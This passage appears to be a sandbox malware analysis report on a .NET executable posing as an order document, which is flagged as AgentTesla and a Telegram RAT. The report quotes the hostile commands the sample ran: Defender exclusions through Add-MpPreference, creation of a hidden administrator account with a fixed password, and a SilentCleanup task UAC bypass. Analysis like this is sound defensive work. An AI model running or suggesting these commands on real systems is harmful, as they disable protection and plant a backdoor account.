                              SHA-512:9BF9099511FEA3FF254E15E2E6F9B7326055BEE64CD89C3B188AB2A9657E63CD571384AFDA41A44A442AFFC97780F6994B89FA4085B19A3437A73527C52C01F9
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053304..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 6008..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053304..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053615.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Kmftd8NL.20220114053244.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.417647435012023
                              Encrypted:false
                              SSDEEP:96:BZMj2NfyqDo1ZwGZVj2NfyqDo1Z1Ln9nznjZZj2NfyqDo1ZDcnDnDnHZy:M
                              MD5:EDED91250DE1A455988D6274C5B9DCBB
                              SHA1:1F72A32B99A6720A6EC28C13AC110645BC3FFED9
                              SHA-256:1F3AE831C246CA98E7651A1615BF35127A008722AC3AD7618D7E7DBF78D70CDF
                              SHA-512:44FDD2EAB6993D00F5A3909B784893D72DB15CB67CF15B87A9BF07405A85BF9EC0950825FB455705E3D28F491E284FF5C80870CFBE7D381F8CFE145B77BE96C3
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053246..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7060..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053246..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053618.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.TjhCOvM7.20220114053243.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.419300447130754
                              Encrypted:false
                              SSDEEP:96:BZHj2Nf1qDo1ZDGZugj2Nf1qDo1ZJLn9nznjZoj2Nf1qDo1ZMcnDnDnaZB:Wc
                              MD5:1553878CE835BF07DFD49311CA17C5AE
                              SHA1:723A3D73B8645D924E55190C42C12F95EEF7568D
                              SHA-256:DC34A98A7FE67DC969F1D49C70BDE76A584FB76A048946D34D6D5E900E914027
                              SHA-512:2CCC216505C0D5D8D12441F425B5E212B728127438DB41900FACC35ADA8E4869E660E0AF922A4F12B53D15A8077EA0C96A0A98F918BB9960D3CE0E9B4D40F009
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053245..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7056..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053245..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053627.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.qPOtysNN.20220114053246.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.377594983509322
                              Encrypted:false
                              SSDEEP:96:BZij2NSqDo1ZMFZ5j2NSqDo1ZjqjA0cA0cA0reZVH:hccl
                              MD5:9B6113ADDFA0768FF34C25E0B1CB1532
                              SHA1:76048CA9695F3E41A457017B082C3B2A3EF36DB6
                              SHA-256:26D14F2938E1D6120DDD49F3A9CC599CFB1BD661841643D108AFE088798B0FF1
                              SHA-512:F2399B022F77E04FAD48BF84D4745ABBEC4E9608B3BD04C651901F90F4B046FB3C60246D725A0B30392DAA58B8FFE3949B52253C5A7E9AB1595C78E596ABC51E
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053248..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053557..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Process:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):844800
                              Entropy (8bit):7.921306694709134
                              Encrypted:false
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              MD5:8B974D65BF7E334D75F57027821AC628
                              SHA1:F3CCC2D15A771715E6653D470F955F7095E3CD17
                              SHA-256:C2628ACD6B807FACD37A0B0DB1068F80FA2C87702D6A687445A9EC1DC3BC2421
                              SHA-512:668DDAED399D33F32C4BDCCB22D77E9EDF27A707BE8F0901417D566125D30D90BD44E039B03548C9C31D17297BCD2CC3AB5D712CBD918B71EAB1B53CFDA70E11
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 19%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`.....................................J........|................... ..........8............................................ ............... ..H............text....`... ...b.................. ..`.rsrc....|.......~...d..............@..@.reloc....... ......................@..@........................H........X..T)......k...h................................................*V!..H.....s.........*J.(.....(....}....*Z..{"....X}".....}....*n.{(...-...s)...}(....{(...*b.{"...-...($...*..}....*b.{"...-...('...*..}....*..{....o....,...(4...*.{.......%..5...s6.....g...o!...&*..{....o....,..(7....1".(8...*.{.......%..9...s:...o;...&*.r...ps<....#...r...ps<....%....s=....&...*..(>...*..(>....s....}.....{.....}.....{.....} ...*Z.{....-..*.{....{....*N.(.....{.....}....*Z.{....-..*.{

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.921306694709134
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:#NEW ORDER FOR JANUARY 2022.exe
                              File size:844800
                              MD5:8b974d65bf7e334d75f57027821ac628
                              SHA1:f3ccc2d15a771715e6653d470f955f7095e3cd17
                              SHA256:c2628acd6b807facd37a0b0db1068f80fa2c87702d6a687445a9ec1dc3bc2421
                              SHA512:668ddaed399d33f32c4bdccb22d77e9edf27a707be8f0901417d566125d30d90bd44e039b03548c9c31d17297bcd2cc3ab5d712cbd918b71eab1b53cfda70e11
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`................................

                              File Icon

                              Icon Hash:00828e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x4c8089
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                              Time Stamp:0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc7f800x4a.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x7cf2.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xc7fca0x38.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xc608f0xc6200False0.937400187303data7.93856030024IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rsrc0xca0000x7cf20x7e00False0.498387896825data6.40175519141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xd20000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              IBC0xca0c40x7736data
                              RT_VERSION0xd17fc0x4f6data

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Version Infos

                              DescriptionData
                              Translation0x0000 0x04b0
                              LegalCopyright Microsoft Corporation. All rights reserved.
                              Assembly Version16.0.0.0
                              InternalNameMicrosoft.VisualStudio.Language.Intellisense.dll
                              FileVersion16.6.255.35071
                              CompanyNameMicrosoft Corporation
                              LegalTrademarks
                              CommentsMicrosoft Visual Studio Editor Platform
                              ProductNameMicrosoft Visual Studio
                              ProductVersion16.6.255+ff88cb6b00.RR
                              FileDescriptionMicrosoft.VisualStudio.Language.Intellisense
                              OriginalFilenameMicrosoft.VisualStudio.Language.Intellisense.dll

                              Network Behavior

                              Network Port Distribution

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 14, 2022 05:34:59.250521898 CET5653453192.168.2.48.8.8.8
                              Jan 14, 2022 05:34:59.269767046 CET53565348.8.8.8192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Jan 14, 2022 05:34:59.250521898 CET192.168.2.48.8.8.80x8a6bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Jan 14, 2022 05:34:59.269767046 CET8.8.8.8192.168.2.40x8a6bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                              Code Manipulations

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: #NEW ORDER FOR JANUARY 2022.exe PID: 6588 Parent PID: 5188

                              General

                              Start time:05:32:26
                              Start date:14/01/2022
                              Path:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              Imagebase:0xdf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              Reputation:low

                              Chronological Activities

                              Analysis Process: powershell.exe PID: 6684 Parent PID: 6588

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 1744 Parent PID: 6684

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: net.exe PID: 3604 Parent PID: 6588

                              General

                              Start time:05:32:31
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 4780 Parent PID: 3604

                              General

                              Start time:05:32:32
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: net1.exe PID: 5692 Parent PID: 3604

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: net.exe PID: 5664 Parent PID: 6588

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 5956 Parent PID: 5664

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: net1.exe PID: 5344 Parent PID: 5664

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: net.exe PID: 6868 Parent PID: 6588

                              General

                              Start time:05:32:35
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup users "user" /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 5952 Parent PID: 6868

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: net1.exe PID: 4864 Parent PID: 6868

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup users "user" /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: net.exe PID: 6908 Parent PID: 6588

                              General

                              Start time:05:32:37
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators "user" /del
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 2628 Parent PID: 6908

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: net1.exe PID: 7040 Parent PID: 6908

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators "user" /del
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: svchost.exe PID: 7136 Parent PID: 568

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: schtasks.exe PID: 6240 Parent PID: 6588

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                              Imagebase:0x10a0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 5460 Parent PID: 6240

                              General

                              Start time:05:32:40
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: powershell.exe PID: 7056 Parent PID: 6588

                              General

                              Start time:05:32:41
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Chronological Activities

                              Analysis Process: powershell.exe PID: 7060 Parent PID: 6588

                              General

                              Start time:05:32:42
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 6964 Parent PID: 7056

                              General

                              Start time:05:32:42
